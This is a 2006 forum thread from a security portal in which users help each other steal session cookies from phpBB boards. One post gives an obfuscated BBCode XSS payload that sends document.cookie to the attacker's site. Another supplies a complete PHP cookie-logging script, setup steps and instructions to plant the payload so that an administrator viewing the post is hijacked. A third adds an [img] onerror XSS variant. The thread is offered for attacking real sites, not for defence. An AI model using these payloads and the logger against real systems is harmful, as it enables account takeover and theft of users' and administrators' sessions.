 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Cookie Man, 2.0.16 xss |
 |
 Posted: Thu Apr 27, 2006 6:49 pm |
 |
|
| Bill324 |
| Regular user |
 |
|
| Joined: Apr 07, 2006 |
| Posts: 11 |
|
|
|
 |
|
 |
|
Hey,
I just need a little matter cleared up.
On the phpbb 2.0.16 cookie stealer thingy, the code looks summin like this:
| Code: | | [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] |
Im just not sure what webadresses I change, say if I was attacking www.teletubbies.com, would I change the script to http://teletubbies.com/cookies.php?
Or do I use my own website 
Many thanks,
-Earnshaw[/code] |
|
|
|
|
| Posted: Thu Apr 27, 2006 9:32 pm |
|
|
| Chb |
| Valuable expert |
 |
|
| Joined: Jul 23, 2005 |
| Posts: 206 |
| Location: Germany |
|
|
|
|
|
|
To your cookie-logging-script of course. -> Your site.
Or how do you get the script into the directory of victim's site?  |
|
|
|
|
| Posted: Sat Apr 29, 2006 6:36 am |
|
|
| Bill324 |
| Regular user |
|
|
| Joined: Apr 07, 2006 |
| Posts: 11 |
|
|
|
|
|
|
|
I did it but...
It just like appeared...with the code. |
|
|
|
|
| Posted: Sat Apr 29, 2006 7:36 pm |
|
|
| johnny |
| Regular user |
|
|
| Joined: Mar 13, 2006 |
| Posts: 13 |
|
|
|
|
|
|
|
You have to have cookies.php on your own website. The code for it is
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>
And you need log.txt on the same website. Both of these files should be in the same directory and have write access and execute access (chmod 777).
Then you change the code that you posted to point to your own website.
Then paste the code into a PM or a post on the target website. When an admin running IE for Windows with autologin on views the post, his cookie will be copied into the file log.txt on your website. |
|
|
|
|
|
|
|
|
| Posted: Wed May 03, 2006 11:58 am |
|
|
| pasching |
| Regular user |
|
|
| Joined: May 03, 2006 |
| Posts: 8 |
|
|
|
|
|
|
|
i use the same cookies.php, the difference is that i use the [img] exploit
only problem is, how do i get him to read the cookie data?
i know it's supposed to be stored in document.cookie but if i do [img]http://www.mywebspace.com/cookies.php?c=document.cookie[/img], then in my log text there's
Cookie: document.cookie
IP: 217.111.50.190
Date and Time: 3 May, 2006, 1:32 pm
Referer: http://www.blabla.com/board/posting.php4?mode=topicreview&t=136498
it probably needs javascript code to read it out
any advice?[/img] |
|
|
|
|
|
|
|
|
| Posted: Wed May 03, 2006 6:48 pm |
|
|
| Chb |
| Valuable expert |
|
|
| Joined: Jul 23, 2005 |
| Posts: 206 |
| Location: Germany |
|
|
|
|
|
|
| pasching wrote: | i use the same cookies.php, the difference is that i use the [img] exploit
only problem is, how do i get him to read the cookie data?
i know it's supposed to be stored in document.cookie but if i do [img]http://www.mywebspace.com/cookies.php?c=document.cookie[/img], then in my log text there's
Cookie: document.cookie
IP: 217.111.50.190
Date and Time: 3 May, 2006, 1:32 pm
Referer: http://www.blabla.com/board/posting.php4?mode=topicreview&t=136498
it probably needs javascript code to read it out
any advice?[/img] |
You need XSS (Cross Site Scripting), this means the possibility to inject own HTML-code, to do this.
Otherwise your JavaScript-code won't be executed. |
|
|
|
|
|
|
|
|
| Posted: Thu May 04, 2006 12:25 am |
|
|
| pasching |
| Regular user |
|
|
| Joined: May 03, 2006 |
| Posts: 8 |
|
|
|
|
|
|
|
hehe, thats not the problem, this is an old 2.0.0 board where you can execute your own code between the img tags
old exploit, worked til 2.0.8 or so
anyways, as you can see i can already get IP adress and referer of the target (or, the person who reads my post)
i can also do whats explained here -> http://marc.theaimsgroup.com/?l=bugtraq&m=102253327105538&w=2, do a [img]http://a.a/a"onerror="javascript:alert(document.cookie)[/img] and it does a popup with my cookie data
so executing code works fine, i just need the correct code for executing my cookies.php
thanks, greets |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 61
Members: 0
Total: 61
